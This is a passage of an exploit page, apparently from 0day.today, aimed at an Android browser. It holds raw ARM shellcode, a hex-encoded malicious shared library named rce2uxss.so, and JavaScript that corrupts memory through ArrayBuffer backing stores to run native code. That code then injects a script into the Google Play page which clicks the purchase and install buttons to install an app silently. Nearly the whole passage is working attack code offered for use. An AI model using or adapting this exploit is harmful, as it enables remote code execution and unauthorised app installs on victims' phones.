xe7,0x14,0x30,0x98,0xe5,0xa3,0x01,0x59,0xe1,0xf2,0xff,0xff,0x3a,0x14,0x50,0x9d,0xe5,0x06,0xe0,0xa0,0xe1,0x24,0xb0,0x9d,0xe5,0x1c,0x90,0x9d,0xe5,0x20,0xa0,0x9d,0xe5,0x14,0xc0,0x99,0xe5,0x10,0x20,0x99,0xe5,0xac,0x11,0xb0,0xe1,0x00,0x10,0xa0,0x13,0x02,0x50,0x85,0xe0,0x01,0x00,0xa0,0x11,0x0c,0x00,0x00,0x0a,0x01,0x30,0xa0,0xe1,0x01,0x00,0x80,0xe2,0x05,0xc0,0xb3,0xe7,0x08,0x10,0x81,0xe2,0x04,0x20,0x93,0xe5,0x52,0x34,0xef,0xe7,0x03,0x22,0x8e,0xe0,0x04,0x30,0x92,0xe5,0x04,0x20,0x83,0xe0,0x04,0x20,0x8c,0xe7,0x14,0xc0,0x99,0xe5,0xac,0x01,0x50,0xe1,0xf2,0xff,0xff,0x3a,0x14,0x00,0x9a,0xe5,0x2b,0x1b,0x9f,0xed,0x20,0x22,0xb0,0xe1,0x20,0x1b,0x8d,0xed,0x0e,0x80,0xa0,0x11,0x00,0x60,0xa0,0x13,0x80,0x50,0x8d,0x12,0x04,0x00,0x00,0x1a,0x0d,0x00,0x00,0xea,0x14,0x90,0x9a,0xe5,0x10,0x80,0x88,0xe2,0x29,0x02,0x56,0xe1,0x09,0x00,0x00,0x2a,0x00,0xe0,0x98,0xe5,0x05,0x10,0xa0,0xe1,0x01,0x60,0x86,0xe2,0x0e,0x00,0x87,0xe0,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0xf4,0xff,0xff,0x1a,0x04,0x70,0x98,0xe5,0x07,0x40,0x84,0xe0,0x01,0x00,0x00,0xea,0xcc,0x4c,0x0c,0xe3,0x14,0x48,0xdf,0xe7,0x18,0xb0,0x9d,0xe5,0x70,0x10,0x8d,0xe2,0xe8,0x20,0x8d,0xe2,0x30,0x50,0x9d,0xe5,0x02,0x00,0xa0,0xe3,0x0c,0xa0,0x9b,0xe5,0x08,0x30,0x9b,0xe5,0x00,0xa0,0x8d,0xe5,0x35,0xff,0x2f,0xe1,0x18,0x00,0x9d,0xe5,0x34,0xff,0x2f,0xe1,0x4b,0xdf,0x8d,0xe2,0xf0,0x8f,0xbd,0xe8,0x00,0x90,0xa0,0xe1,0x20,0x00,0x8d,0xe5,0x00,0xa0,0xa0,0xe1,0x2c,0x00,0x8d,0xe5,0x00,0x20,0xa0,0xe1,0x00,0x30,0xa0,0xe1,0x98,0xff,0xff,0xea,0x00,0xf0,0x20,0xe3,0x73,0x6f,0x5f,0x6d,0x61,0x69,0x6e,0x00,]; var so_str = "7f454c460101010000000000000000000300280001000000000000003400000044110000000000053400200008002800150014000600000034000000340000003400000000010000000100000400000004000000030000003401000034010000340100001300000013000000040000000100000001000000000000000000000000000000d80d0000d80d0000050000000010000001000000a40e0000a41e0000a41e00006c01000082010000060000000010000002000000a80e0000a81e0000a81e00002801000028010000060000000400000051e574640000000000000000000000000000000000000000060000000000000001000070d40c0000d40c0000d40c00002000000020000000040000000400000052e57464a40e0000a41e0000a41e00005c0100005c01000006000000040000002f73797374656d2f62696e2f6c696e6b657200000000000000000000000000000000000001000000000000000000000012000000100000000000000000000000120000001d00000000000000000000001200000034000000000000000000000012000000480000000000000000000000120000004f000000000000000000000012000000560000000000000000000000120000005d000000a00800003404000012000800650000000000000000000000120000006e0000000000000000000000120000007f0000000000000000000000110000009100000010200000000000001000f1ff9800000010200000000000001000f1ffa400000026200000000000001000f1ff005f5f6378615f66696e616c697a65005f5f6378615f617465786974005f5f61656162695f756e77696e645f6370705f707230005f5f616e64726f69645f6c6f675f7072696e74006d616c6c6f63006d656d736574006d656d63707900736f5f6d61696e006d70726f74656374005f5f737461636b5f63686b5f6661696c005f5f737461636b5f63686b5f6775617264005f6564617461005f5f6273735f7374617274005f656e64006c6962632e736f006c69626d2e736f006c6962737464632b2b2e736f006c69626d656469616e646b2e736f006c69627574696c732e736f006c696262696e6465722e736f006c69626d656469612e736f006c696273746167656672696768742e736f006c696273746167656672696768745f666f756e646174696f6e2e736f006c6962637574696c732e736f006c6962696e7075742e736f006c6962646c2e736f006c6962616e64726f69645f72756e74696d652e736f0072636532757873732e736f00000000030000000f0000000c0000000e0000000d0000000000000000000000000000000200000001000000040000000000000006000000050000000800000007000000030000000a000000090000000b000000a41e0000170000000020000017000000d01f0000150b0000e01f000016010000e41f000016020000e81f000016040000ec1f000016050000f01f000016060000f41f000016070000f81f000016090000fc1f0000160a000004e02de504e09fe50ee08fe008f0bee5741b000000c68fe201ca8ce274fbbce500c68fe201ca8ce26cfbbce500c68fe201ca8ce264fbbce500c68fe201ca8ce25cfbbce500c68fe201ca8ce254fbbce500c68fe201ca8ce24cfbbce500c68fe201ca8ce244fbbce500c68fe201ca8ce23cfbbce500482de904b08de20c309fe503308fe00300a0e1e1ffffeb0088bde8281b000000482de904b08de208d04de208000be508301be5000053e30100000a08301be533ff2fe104d04be20088bde800482de904b08de208d04de208000be528309fe503308fe00300a0e108101be51c309fe503308fe00320a0e1cbffffeb0030a0e10300a0e104d04be20088bde8b8ffffffc41a000020d04de20c008de508108de504208de500308de50030a0e31730cde50030a0e318308de5210000ea0030a0e31c308de50030a0e31c308de50f0000ea18209de51c309de5033082e004209de5033082e00020d3e50c109de51c309de5033081e00030d3e5030052e10000000a060000ea1c309de5013083e21c308de51c209de508309de5030052e1ebffff3a1c209de508309de5030052e10100001a18309de5090000ea18309de5013083e218308de518209de508309de5032082e000309de5030052e1d7ffff9a0030e0e30300a0e120d08de21eff2fe104e02de524d04de20c008de508108de514329fe503308fe0003093e50320a0e108329fe503308fe002c0a0e10700b3e800008ce504108ce508208ce5f0319fe503308fe00030d3e5013023e27330efe6000053e36900000ad8319fe503308fe00120a0e30020c3e508309de500308de50600a0e3c0319fe503308fe00310a0e1b8319fe503308fe00320a0e10c309de56dffffeb08309de5003093e510308de510309de5043083e2003093e514308de510309de50c3083e218308de518309de500308de50600a0e374319fe503308fe00310a0e16c319fe503308fe00320a0e114309de558ffffeb5c319fe503308fe0002093e514309de5033082e00300a0e154ffffeb0030a0e11c308de53c319fe503308fe0002093e514309de5033082e01c009de50010a0e30320a0e14cffffeb10309de51c009de50310a0e10c20a0e34affffeb1c309de50c1083e200319fe503308fe0002093e5f8309fe503308fe0003093e50100a0e10210a0e10320a0e13effffebe0309fe503308fe0003093e50c3083e21c209de5032082e018309de50200a0e10310a0e114209de533ffffeb1c309de5043083e2b0209fe502208fe0001092e514209de5022081e0002083e51c309de5043083e2003093e51c209de50c2082e200208de50600a0e380209fe502208fe00210a0e178209fe502208fe015ffffeb08309de51c209de5002083e564309fe503308fe0003093e5013083e20c009de508109de533ff2fe10030a0e10300a0e124d08de204f09de4d4190000a8190000ac190000901900004406000040060000f005000008060000f8180000d418000090180000881800006c18000038180000dc040000f4040000d817000010402de928d04de20c008de570439fe504408fe06c339fe5033094e7003093e524308de560339fe503308fe00030d3e5013023e27330efe6000053e3c700000a48339fe503308fe00120a0e30020c3e50600a0e338339fe503308fe00310a0e130339fe503308fe00320a0e10c309de5d9feffeb0c309de5003093e514308de50600a0e310339fe503308fe00310a0e108339fe503308fe00320a0e114309de5cdfeffeb0c309de5183083e2003093e50320a0e1e8329fe503308fe0002083e50c309de51c3083e2002093e5d4329fe503308fe0002083e5cc329fe503308fe0003093e5c4229fe502208fe0001092e5bc229fe502208fe0002092e500108de504208de50600a0e3a8229fe502208fe00210a0e1a0229fe502208fe0aefeffeb98229fe502208fe01c308de2000092e5041092e50300a3e814309de580229fe502208fe00200a0e10c10a0e30320a0e180330ce3c93140e3d6feffeb18008de518209de514309de5032082e054329fe503308fe0002083e54c329fe503308fe0003093e50c3083e2012083e23c329fe503308fe0002083e534329fe503308fe0003093e50600a0e328229fe502208fe00210a0e120229fe502208fe086feffeb18309de5010073e36400000a010aa0e384feffeb0030a0e10320a0e1fc319fe503308fe0002083e5f4319fe503308fe0003093e50600a0e3e8219fe502208fe00210a0e1e0219fe502208fe072feffebd8319fe503308fe0003093e5ff3ec3e30f30c3e30300a0e1021aa0e30720a0e375feffebb8319fe503308fe0003093e5ff3ec3e30f30c3e30300a0e1021aa0e30720a0e36cfeffeb98319fe503308fe0002093e590319fe503308fe002c0a0e10700b3e800008ce504108ce508208ce578319fe503308fe0003093e50c2083e2df380fe300304fe3003082e560319fe503308fe0002093e51030a0e3033082e050219fe502208fe0002092e5002083e50600a0e340319fe503308fe00310a0e138319fe503308fe00320a0e130319fe503308fe03cfeffeb0600a0e324319fe503308fe00310a0e11c319fe503308fe00320a0e134feffeb10319fe503308fe0003093e50320a0e1df380fe300304fe3003082e5f8309fe503308fe0003093e5043083e2ec209fe502208fe0002083e50600a0e3e0309fe503308fe00310a0e1d8309fe503308fe00320a0e11efeffeb20309fe5033094e724209de5003093e5030052e10000000a26feffeb28d08de21080bde81c170000fcffffff5517000039170000f40300001c040000c403000008040000b8160000a416000098160000881600007c160000400300009c030000040400001c16000008160000fc150000d8150000dc150000a0020000100300008c1500008015000050020000dc020000581500004015000010150000f4140000e8140000cc140000b41400008401000020020000a8faffff5c010000140200006c1400005014000050faffff04010000c801000084f8ff7fb0b0078054f9ff7f00840880bcfbff7fb0a80980e8ffff7f010000006578706c6f697400746869732069732025782c736f75726365436f6465206174202578006c656e2069732025642c25730000000061727261792062756666657220616464726573732061742025780000646c6f70656e206164647265737320617420257800000000737472696e672069732025642c25702c2573000066696e6420636f6d70696c652066756e6374696f6e20617420257800636f6465736e6970742061742025700066616b655f646f4578656375746553637269707420617420257000006265666f726520686f6f6b00616674657220686f6f6b00000302010204050607000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000c404000003000000d41f000002000000400000001700000010040000140000001100000011000000f803000012000000180000001300000008000000faffff6f0200000006000000480100000b0000001000000005000000380200000a0000006d01000004000000a803000001000000a900000001000000b100000001000000b900000001000000c600000001000000d500000001000000e100000001000000ee00000001000000fa000000010000000c010000010000002901000001000000360100000100000042010000010000004b0100000e000000610100001a000000a41e00001c000000040000001e00000008000000fbffff6f01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005004000050040000500400005004000050040000500400005004000050040000002000002de9f04f0746a1b008468846004743433a2028474e552920342e3800040000000900000004000000474e5500676f6c6420312e3131000000413d00000061656162690001330000000541524d20763700060a0741080109020a030c011102120414011501170318011a021b031e0622012a012c02440372636532757873732e736f0064b3a5da002e7368737472746162002e696e74657270002e64796e73796d002e64796e737472002e68617368002e72656c2e64796e002e72656c2e706c74002e74657874002e41524d2e6578696478002e726f64617461002e66696e695f6172726179002e64796e616d6963002e676f74002e64617461002e627373002e636f6d6d656e74002e6e6f74652e676e752e676f6c642d76657273696f6e002e41524d2e61747472696275746573002e676e755f64656275676c696e6b000000000000000000000000000000000000000000000000000000000000000000000000000000000000000b000000010000000200000034010000340100001300000000000000000000000100000000000000130000000b000000020000004801000048010000f0000000030000000100000004000000100000001b000000030000000200000038020000380200006d01000000000000000000000100000000000000230000000500000002000000a8030000a80300005000000002000000000000000400000004000000290000000900000002000000f8030000f8030000180000000200000000000000040000000800000032000000090000000200000010040000100400004000000002000000070000000400000008000000360000000100000006000000500400005004000074000000000000000000000004000000000000003b0000000100000006000000c4040000c40400001008000000000000000000000400000000000000410000000100007082000000d40c0000d40c000020000000080000000000000004000000080000004c0000000100000002000000f40c0000f40c0000e400000000000000000000000400000000000000540000000f00000003000000a41e0000a40e00000400000000000000000000000400000000000000600000000600000003000000a81e0000a80e00002801000003000000000000000400000008000000690000000100000003000000d01f0000d00f000030000000000000000000000004000000000000006e000000010000000300000000200000001000001000000000000000000000000400000000000000740000000800000003000000102000001010000016000000000000000000000004000000000000007900000001000000300000000000000010100000100000000000000000000000010000000100000082000000070000000000000000000000201000001c00000000000000000000000400000000000000990000000300007000000000000000003c1000003e00000000000000000000000100000000000000a90000000100000000000000000000007a1000001000000000000000000000000100000000000000010000000300000000000000000000008a100000b800000000000000000000000100000000000000"; var arrayBuffer = new ArrayBuffer(0x1000000); var arrayBufferAddress = getObjAddr(arrayBuffer)-1; var backingStoreAddress = read_uint32(arrayBufferAddress+4*4); var args_address = backingStoreAddress+1024; function write_shellcode(dlsym_addr,buffer){ //ldr r0,[pc,4]//0xe59f0004 //ldr r1,[pc,4]//0xe59f1004 //b shellcode;//0xea000001 //dlopen_addr//array_buffer_address //dlsym_addr //shellcode //var stub=[0xe59f0004,0xe59f1004,0xea000001,dlsym_addr+0xc,dlsym_addr]; var stub=[0xe59f0004,0xe59f1004,0xea000001,args_address,0x1000000]; for(var i=0;i<stub.length;i++){ globaldv[buffer/4+i]=stub[i]; } shellcode = shellcode.concat([0,0,0,0]); for(var i=0;i<shellcode.length/4>>>0;i++){ // u8arr[i+4*stub.length]=shellcode[i]; globaldv[buffer/4+stub.length+i] = (shellcode[4*i+3]<<24)+(shellcode[4*i+2]<<16)+(shellcode[4*i+1]<<8)+(shellcode[4*i]); } return stub.length*4+shellcode.length; } function xss_code(){ //alert(navigator.userAgent); //alert(document.cookie); var i1=setInterval(function(){ if(!(document&&document.body&&document.body.innerHTML&&document.body.innerHTML.match(/This app is compatible/)!=null)){ console.log("wait load complete"); return; } clearInterval(i1); var i2=setInterval(function(){ document.getElementsByClassName("price buy id-track-click")[0].click(); var installButton = document.getElementById("purchase-ok-button"); if(installButton == null) return; installButton.click(); document.write("<h1>The app will be installed shortly, Pwned by 360 Alpha Team</h1>"); clearInterval(i2); setTimeout(function(){ window.open("intent://scan/#Intent;scheme=zxing;package=com.google.zxing.client.android;end"); },26000); },500); },500); } var js_str="\n"+xss_code.toString()+"xss_code();\n"; //var backup_arr = backup_original_code(huge_func_code_entry); var writed_len = write_shellcode(dlsym_addr,huge_func_code_entry); var args_view = new DataView(arrayBuffer,1024,100); var so_file_view = new DataView(arrayBuffer,4096); var js_view = new DataView(arrayBuffer,0x100000); args_view.setUint32(0,dlsym_addr+0xc,true); args_view.setUint32(4,dlsym_addr,true); args_view.setUint32(8,huge_func_code_entry,true); args_view.setUint32(12,writed_len,true); args_view.setUint32(16,backingStoreAddress+4096,true); args_view.setUint32(20,so_str.length/2,true); args_view.setUint32(24,backingStoreAddress+0x100000,true); args_view.setUint32(28,js_str.length,true); print("length is "+so_str.length); for(var i=0;i<so_str.length;i+=2){ var value = so_str.substr(i,2); value = "0x"+value; so_file_view.setUint8(i/2,parseInt(value)); } for(var i=0;i<js_str.length;i++){ js_view.setUint8(i,js_str.charCodeAt(i)); } print("begin execute shellcode"); huge_func({}); print("done"); postMessage(true); //prevent arrayBuffer to be released while(1){} } //main world function print(){ console.log.apply(null,arguments); document.write('<p >'); document.write.apply(document,arguments); document.write("<p>"); } // Build a worker from an anonymous function body var blobURL = URL.createObjectURL( new Blob([ '(',exploit.toString(),')()' ], { type: 'application/javascript' } ) ); var worker; var exploitSucc = false; var count = 0; function startExploit(){ print("worker thread is started"); worker = new Worker( blobURL ); count++; worker.onmessage = function(e){ print("exploit result is "+e.data); exploitSucc = e.data; if(exploitSucc==false){ startExploit(); return; } var end = +new Date(); print("time diff is "+(end-begin)/1000); //top.location='https://play.google.com/store/apps/details?id=com.google.zxing.client.android'; top.location='https://play.google.com/store/apps/details?id=com.kitkats.qrscanner'; } } var begin = +new Date(); startExploit(); var savedCount = 0; var hangMonitor = setInterval(function (){ if(exploitSucc==true){ clearInterval(hangMonitor); }else{ if(savedCount==count){//maybe hang print("worker maybe hange"); worker.terminate(); startExploit(); }else{ print("worker is normal"); savedCount = count; } } },10000); //URL.revokeObjectURL( blobURL ); </script> </html> # 0day.today [2024-03-29] #